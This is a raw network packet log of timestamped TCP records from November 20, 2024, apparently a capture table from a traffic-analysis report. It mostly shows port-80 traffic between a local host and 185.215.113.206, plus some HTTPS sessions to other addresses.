                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985641956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985656023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985665083 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985680103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985696077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985697985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985713959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985722065 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985732079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985747099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985771894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985771894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985774040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985790968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985814095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985816002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985831976 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985837936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985848904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985851049 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985863924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985879898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985894918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985898018 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985898018 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985909939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985925913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985925913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985927105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985940933 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985966921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985966921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986520052 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986536026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986551046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986569881 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986582994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986582994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986607075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986651897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986675024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986834049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986850023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986864090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986881018 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986897945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986906052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986906052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986915112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986927986 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986927986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986947060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986958027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.986990929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.987018108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.987035036 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.987050056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.987087011 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.987118006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990883112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990899086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990920067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990932941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990951061 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990966082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990976095 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990983009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.990984917 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991008997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991033077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991039038 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991039038 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991048098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991056919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991069078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991086006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991086960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991102934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991118908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991132975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991132975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991133928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991149902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991149902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991199970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991199970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991245031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991274118 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991291046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991297007 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991306067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991331100 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991333008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991333008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991347075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991359949 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991359949 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991384029 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991477966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991503954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991527081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991540909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991549015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991555929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991575003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991606951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991611004 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991625071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991640091 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991666079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991669893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991682053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991697073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991713047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991719961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991719961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991729975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991744041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991750956 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991759062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991777897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991780043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991799116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991811991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991812944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991828918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991831064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991847038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991864920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991882086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991889954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991902113 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991905928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991921902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991936922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991940022 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991940022 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.991991997 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992024899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992039919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992053986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992069006 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992084026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992095947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992095947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992100954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992119074 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992126942 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992135048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992146015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992151022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992166042 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992211103 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992211103 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992259026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.992414951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.997983932 CET4434995413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.998066902 CET49954443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.018722057 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.018771887 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.018831015 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.018831968 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.018877029 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.019134998 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.019150019 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.019187927 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.019193888 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.022763968 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.022766113 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.022799969 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.022896051 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.023072958 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.023085117 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.023267984 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.023274899 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.024238110 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.024439096 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.024457932 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.024564028 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.024619102 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.025640011 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.025707960 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026030064 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026117086 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026350975 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026415110 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026724100 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026734114 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026952028 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.026959896 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.027869940 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.027949095 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028004885 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028192997 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028201103 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028213024 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028217077 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028310061 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028328896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028345108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028362989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028369904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028369904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028389931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028410912 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028410912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028429031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028444052 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028464079 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028464079 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028469086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028479099 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028495073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028522968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028531075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028538942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028553963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028568983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028580904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028580904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028584003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028594017 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028615952 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028616905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.028690100 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.031331062 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.031354904 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.031411886 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.031605005 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.031616926 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.033890009 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.033921957 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.034521103 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.038738012 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.038747072 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.038851023 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.038872004 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.039058924 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.039084911 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.039794922 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.039854050 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.039921045 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.040116072 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.040443897 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.040514946 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.040555000 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.040611982 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041069984 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041134119 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041465044 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041546106 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041693926 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041708946 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041853905 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041860104 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041913986 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.041922092 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.046638966 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.047245979 CET49955443192.168.2.613.107.246.45
